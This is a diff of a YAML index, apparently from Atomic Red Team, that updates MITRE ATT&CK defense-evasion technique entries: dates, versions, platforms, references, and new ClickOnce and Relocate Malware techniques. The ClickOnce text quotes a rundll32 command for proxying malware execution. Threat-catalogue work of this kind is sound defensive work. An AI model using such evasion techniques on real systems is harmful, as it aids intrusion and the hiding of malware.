@@ -21015,9 +21153,8 @@ defense-evasion:
         url: https://wunderwuzzi23.github.io/blog/passthecookie.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.002:
     technique:
@@ -21097,7 +21234,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.009:
     technique:
@@ -21131,7 +21267,7 @@ defense-evasion:
       - source_name: LOLBAS Regasm
         url: https://lolbas-project.github.io/lolbas/Binaries/Regasm/
         description: LOLBAS. (n.d.). Regasm.exe. Retrieved July 31, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:55:48.725Z'
       name: 'Signed Binary Proxy Execution: Regsvcs/Regasm'
       description: |-
         Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)
@@ -21158,8 +21294,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.009
     atomic_tests:
     - name: Regasm Uninstall Method Call Test
@@ -21333,7 +21467,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.004
     atomic_tests:
     - name: Install root CA on Windows
@@ -21426,43 +21559,20 @@ defense-evasion:
         elevation_required: true
   T1027.004:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
-      type: attack-pattern
-      created: '2020-03-16T15:30:57.711Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1027.004
-        url: https://attack.mitre.org/techniques/T1027/004
-      - description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
-          in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
-          campaign. Retrieved November 29, 2018.'
-        url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
-        source_name: ClearSky MuddyWater Nov 2018
-      - source_name: TrendMicro WindowsAppMac
-        url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
-        description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
-          Info Stealer and Adware. Retrieved April 25, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-10-03T17:43:14.766Z'
       name: 'Obfuscated Files or Information: Compile After Delivery'
       description: |-
-        Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
+        Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as ilasm.exe(Citation: ATTACK IQ), csc.exe, or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
 
         Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Praetorian
+      - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
+      - Liran Ravich, CardinalOps
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor the execution file paths and command-line arguments
         for common compilers, such as csc.exe and GCC/MinGW, and correlate with other
         suspicious behavior to reduce false positives from normal user and administrator
@@ -21471,9 +21581,14 @@ defense-evasion:
         and execution frameworks like Mono and determine if they have a legitimate
         purpose on the system.(Citation: TrendMicro WindowsAppMac) Typically these
         should only be used in specific and limited cases, like for software development.'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Creation'
@@ -21485,12 +21600,35 @@ defense-evasion:
       - Anti-virus
       - Binary Analysis
       - Static File Analysis
-      x_mitre_permissions_required:
-      - User
       x_mitre_system_requirements:
       - Compiler software (either native to the system or delivered by the adversary)
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
+      created: '2020-03-16T15:30:57.711Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1027/004
+        external_id: T1027.004
+      - source_name: ClearSky MuddyWater Nov 2018
+        description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
+          in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
+          campaign. Retrieved November 29, 2018.'
+        url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
+      - source_name: ATTACK IQ
+        description: 'Federico Quattrin, Nick Desler, Tin Tam, & Matthew Rutkoske.
+          (2023, March 16). Hiding in Plain Sight: Monitoring and Testing for Living-Off-the-Land
+          Binaries. Retrieved July 15, 2024.'
+        url: https://www.attackiq.com/2023/03/16/hiding-in-plain-sight/
+      - source_name: TrendMicro WindowsAppMac
+        description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
+          Info Stealer and Adware. Retrieved April 25, 2019.
+        url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1027.004
     atomic_tests:
     - name: Compile After Delivery using csc.exe
@@ -21607,7 +21745,7 @@ defense-evasion:
         url: https://github.com/decalage2/oletools
         description: decalage2. (2019, December 3). python-oletools. Retrieved September
           18, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T14:02:07.944Z'
       name: VBA Stomping
       description: |-
         Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)
@@ -21633,12 +21771,10 @@ defense-evasion:
       x_mitre_system_requirements:
       - MS Office version specified in <code>_VBA_PROJECT</code> stream must match
         host
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1197:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:21:40.927Z'
       name: BITS Jobs
       description: |-
         Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
@@ -21728,7 +21864,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1197
     atomic_tests:
     - name: Bitsadmin Download (cmd)
@@ -21911,7 +22046,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1127.001
     atomic_tests:
     - name: MSBuild Bypass Using Inline Tasks (C#)
@@ -21992,7 +22126,7 @@ defense-evasion:
         name: command_prompt
   T1656:
     technique:
-      modified: '2023-09-30T19:45:05.886Z'
+      modified: '2024-10-15T15:59:06.382Z'
       name: Impersonation
       description: "Adversaries may impersonate a trusted person or organization in
         order to persuade and trick a target into performing some action on their
@@ -22034,10 +22168,9 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       type: attack-pattern
@@ -22061,18 +22194,30 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1578.005:
     technique:
-      modified: '2023-10-02T22:17:54.968Z'
+      modified: '2024-09-25T14:15:26.322Z'
       name: Modify Cloud Compute Configurations
-      description: |-
-        Adversaries may modify settings that directly affect the size, locations, and resources available to cloud compute infrastructure in order to evade defenses. These settings may include service quotas, subscription associations, tenant-wide policies, or other configurations that impact available compute. Such modifications may allow adversaries to abuse the victim’s compute resources to achieve their goals, potentially without affecting the execution of running instances and/or revealing their activities to the victim.
-
-        For example, cloud providers often limit customer usage of compute resources via quotas. Customers may request adjustments to these quotas to support increased computing needs, though these adjustments may require approval from the cloud provider. Adversaries who compromise a cloud environment may similarly request quota adjustments in order to support their activities, such as enabling additional [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking 2023) Adversaries may also increase allowed resource usage by modifying any tenant-wide policies that limit the sizes of deployed virtual machines.(Citation: Microsoft Azure Policy)
-
-        Adversaries may also modify settings that affect where cloud resources can be deployed, such as enabling [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535). In Azure environments, an adversary who has gained access to a Global Administrator account may create new subscriptions in which to deploy resources, or engage in subscription hijacking by transferring an existing pay-as-you-go subscription from a victim tenant to an adversary-controlled tenant.(Citation: Microsoft Peach Sandstorm 2023) This will allow the adversary to use the victim’s compute resources without generating logs on the victim tenant.(Citation: Microsoft Azure Policy) (Citation: Microsoft Subscription Hijacking 2022)
+      description: "Adversaries may modify settings that directly affect the size,
+        locations, and resources available to cloud compute infrastructure in order
+        to evade defenses. These settings may include service quotas, subscription
+        associations, tenant-wide policies, or other configurations that impact available
+        compute. Such modifications may allow adversaries to abuse the victim’s compute
+        resources to achieve their goals, potentially without affecting the execution
+        of running instances and/or revealing their activities to the victim.\n\nFor
+        example, cloud providers often limit customer usage of compute resources via
+        quotas. Customers may request adjustments to these quotas to support increased
+        computing needs, though these adjustments may require approval from the cloud
+        provider. Adversaries who compromise a cloud environment may similarly request
+        quota adjustments in order to support their activities, such as enabling additional
+        [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising
+        suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking
+        2023) Adversaries may also increase allowed resource usage by modifying any
+        tenant-wide policies that limit the sizes of deployed virtual machines.(Citation:
+        Microsoft Azure Policy)\n\nAdversaries may also modify settings that affect
+        where cloud resources can be deployed, such as enabling [Unused/Unsupported
+        Cloud Regions](https://attack.mitre.org/techniques/T1535). "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -22086,7 +22231,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      x_mitre_version: '1.0'
+      x_mitre_version: '2.0'
       x_mitre_data_sources:
       - 'Cloud Service: Cloud Service Modification'
       type: attack-pattern
@@ -22098,20 +22243,11 @@ defense-evasion:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1578/005
         external_id: T1578.005
-      - source_name: Microsoft Subscription Hijacking 2022
-        description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
-          using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
-        url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
       - source_name: Microsoft Cryptojacking 2023
         description: 'Microsoft Threat Intelligence. (2023, July 25). Cryptojacking:
           Understanding and defending against cloud compute resource abuse. Retrieved
           September 5, 2023.'
         url: https://www.microsoft.com/en-us/security/blog/2023/07/25/cryptojacking-understanding-and-defending-against-cloud-compute-resource-abuse/
-      - source_name: Microsoft Peach Sandstorm 2023
-        description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
-          password spray campaigns enable intelligence collection at high-value targets.
-          Retrieved September 18, 2023.
-        url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
       - source_name: Microsoft Azure Policy
         description: Microsoft. (2023, August 30). Azure Policy built-in policy definitions.
           Retrieved September 5, 2023.
@@ -22120,11 +22256,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.008:
     technique:
-      modified: '2024-04-12T21:13:56.431Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Impair Defenses: Disable Cloud Logs'
       description: |-
         An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities.
@@ -22133,6 +22268,7 @@ defense-evasion:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -22142,6 +22278,7 @@ defense-evasion:
       - Janantha Marasinghe
       - Matt Snyder, VMware
       - Joe Gumke, U.S. Bank
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor logs for API calls to disable logging. In AWS, monitor
         for: <code>StopLogging</code> and <code>DeleteTrail</code>.(Citation: Stopping
@@ -22153,13 +22290,13 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - IaaS
       - SaaS
-      - Google Workspace
-      - Azure AD
-      - Office 365
-      x_mitre_version: '2.0'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Cloud Service: Cloud Service Modification'
       - 'User Account: User Account Modification'
@@ -22204,9 +22341,6 @@ defense-evasion:
         url: https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/detection__disruption/main.py
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.008
     atomic_tests: []
   T1564.003:
@@ -22289,7 +22423,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564.003
     atomic_tests:
     - name: Hidden Window
@@ -22351,15 +22484,138 @@ defense-evasion:
           '
         name: powershell
         elevation_required: true
+  T1127.002:
+    technique:
+      modified: '2024-10-17T18:50:41.474Z'
+      name: ClickOnce
+      description: |-
+        Adversaries may use ClickOnce applications (.appref-ms and .application files) to proxy execution of code through a trusted Windows utility.(Citation: Burke/CISA ClickOnce BlackHat) ClickOnce is a deployment that enables a user to create self-updating Windows-based .NET applications (i.e, .XBAP, .EXE, or .DLL) that install and run from a file share or web page with minimal user interaction. The application launches as a child process of DFSVC.EXE, which is responsible for installing, launching, and updating the application.(Citation: SpectorOps Medium ClickOnce)
+
+        Because ClickOnce applications receive only limited permissions, they do not require administrative permissions to install.(Citation: Microsoft Learn ClickOnce) As such, adversaries may abuse ClickOnce to proxy execution of malicious code without needing to escalate privileges.
+
+        ClickOnce may be abused in a number of ways. For example, an adversary may rely on [User Execution](https://attack.mitre.org/techniques/T1204). When a user visits a malicious website, the .NET malware is disguised as legitimate software and a ClickOnce popup is displayed for installation.(Citation: NetSPI ClickOnce)
+
+        Adversaries may also abuse ClickOnce to execute malware via a [Rundll32](https://attack.mitre.org/techniques/T1218/011) script using the command `rundll32.exe dfshim.dll,ShOpenVerbApplication1`.(Citation: LOLBAS /Dfsvc.exe)
+
+        Additionally, an adversary can move the ClickOnce application file to a remote user’s startup folder for continued malicious code deployment (i.e., [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001)).(Citation: Burke/CISA ClickOnce BlackHat)(Citation: Burke/CISA ClickOnce Paper)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Wirapong Petshagun
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'Command: Command Execution'
+      - 'Process: Process Metadata'
+      - 'Module: Module Load'
+      x_mitre_system_requirements:
+      - ".NET Framework"
+      type: attack-pattern
+      id: attack-pattern--cc279e50-df85-4c8e-be80-6dc2eda8849c
+      created: '2024-09-09T14:39:28.637Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1127/002
+        external_id: T1127.002
+      - source_name: LOLBAS /Dfsvc.exe
+        description: LOLBAS. (n.d.). /Dfsvc.exe. Retrieved September 9, 2024.
+        url: https://lolbas-project.github.io/lolbas/Binaries/Dfsvc/
+      - source_name: Microsoft Learn ClickOnce
+        description: Microsoft. (2023, September 14). ClickOnce security and deployment.
+          Retrieved September 9, 2024.
+        url: https://learn.microsoft.com/en-us/visualstudio/deployment/clickonce-security-and-deployment?view=vs-2022
+      - source_name: SpectorOps Medium ClickOnce
+        description: 'Nick Powers. (2023, June 7). Less SmartScreen More Caffeine:
+          (Ab)Using ClickOnce for Trusted Code Execution. Retrieved September 9, 2024.'
+        url: https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5
+      - source_name: NetSPI ClickOnce
+        description: Ryan Gandrud. (2015, March 23). All You Need Is One – A ClickOnce
+          Love Story. Retrieved September 9, 2024.
+        url: https://www.netspi.com/blog/technical-blog/adversary-simulation/all-you-need-is-one-a-clickonce-love-story/
+      - source_name: Burke/CISA ClickOnce Paper
+        description: William J. Burke IV. (n.d.). Appref-ms Abuse for  Code Execution
+          & C2. Retrieved September 9, 2024.
+        url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended-wp.pdf?_gl=1*1jv89bf*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.256219723.1512103758.1724809895-1999078900.1724809894
+      - source_name: Burke/CISA ClickOnce BlackHat
+        description: 'William Joseph Burke III. (2019, August 7). CLICKONCE AND YOU’RE
+          IN: When .appref-ms abuse is operating as intended. Retrieved September
+          9, 2024.'
+        url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended.pdf?_gl=1*16njas6*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.253743689.1512103758.1724809895-1999078900.1724809894
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1070.010:
+    technique:
+      modified: '2024-10-13T15:48:46.391Z'
+      name: Relocate Malware
+      description: |-
+        Once a payload is delivered, adversaries may reproduce copies of the same malware on the victim system to remove evidence of their presence and/or avoid defenses. Copying malware payloads to new locations may also be combined with [File Deletion](https://attack.mitre.org/techniques/T1070/004) to cleanup older artifacts.
+
+        Relocating malware may be a part of many actions intended to evade defenses. For example, adversaries may copy and rename payloads to better blend into the local environment (i.e., [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: DFIR Report Trickbot June 2023) Payloads may also be repositioned to target [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012) as well as specific locations associated with establishing [Persistence](https://attack.mitre.org/tactics/TA0003).(Citation: Latrodectus APR 2024)
+
+        Relocating malicious payloads may also hinder defensive analysis, especially to separate these payloads from earlier events (such as [User Execution](https://attack.mitre.org/techniques/T1204) and [Phishing](https://attack.mitre.org/techniques/T1566)) that may have generated alerts or otherwise drawn attention from defenders.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Matt Anderson, @‌nosecurething, Huntress
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'File: File Modification'
+      type: attack-pattern
+      id: attack-pattern--cc36eeae-2209-4e63-89d3-c97e19edf280
+      created: '2024-05-31T11:07:57.406Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1070/010
+        external_id: T1070.010
+      - source_name: Latrodectus APR 2024
+        description: 'Proofpoint Threat Research and Team Cymru S2 Threat Research.
+          (2024, April 4). Latrodectus: This Spider Bytes Like Ice . Retrieved May
+          31, 2024.'
+        url: https://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-bytes-ice
+      - source_name: DFIR Report Trickbot June 2023
+        description: The DFIR Report. (2023, June 12). A Truly Graceful Wipe Out.
+          Retrieved May 31, 2024.
+        url: https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1556.009:
     technique:
-      modified: '2024-04-18T20:53:46.175Z'
+      modified: '2024-09-16T16:54:47.595Z'
       name: Conditional Access Policies
       description: "Adversaries may disable or modify conditional access policies
         to enable persistent access to compromised accounts. Conditional access policies
         are additional verifications used by identity providers and identity and access
         management systems to determine whether a user should be granted access to
-        a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+        a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
         denied access to applications based on their IP address, device enrollment
         status, and use of multi-factor authentication.(Citation: Microsoft Conditional
         Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -22392,10 +22648,9 @@ defense-evasion:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
-      - SaaS
       - IaaS
-      x_mitre_version: '1.0'
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Cloud Service: Cloud Service Modification'
@@ -22432,40 +22687,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1578.002:
     technique:
-      x_mitre_platforms:
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
-      type: attack-pattern
-      created: '2020-05-14T14:45:15.978Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1578.002
-        url: https://attack.mitre.org/techniques/T1578/002
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      - source_name: AWS CloudTrail Search
-        url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
-        description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
-          Retrieved June 17, 2020.
-      - source_name: Azure Activity Logs
-        url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
-        description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
-          2020.
-      - source_name: Cloud Audit Logs
-        url: https://cloud.google.com/logging/docs/audit#admin-activity
-        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-30T13:28:37.416Z'
       name: Create Cloud Instance
       description: |-
         An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)
@@ -22474,20 +22699,50 @@ defense-evasion:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Arun Seelagan, CISA
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         The creation of a new instance or VM is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, the creation of an instance by a new user account or the unexpected creation of one or more snapshots followed by the creation of an instance may indicate suspicious activity.
 
         In AWS, CloudTrail logs capture the creation of an instance in the <code>RunInstances</code> event, and in Azure the creation of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of <code>gcloud compute instances create</code> to create a VM.(Citation: Cloud Audit Logs)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Instance: Instance Creation'
       - 'Instance: Instance Metadata'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
+      created: '2020-05-14T14:45:15.978Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1578/002
+        external_id: T1578.002
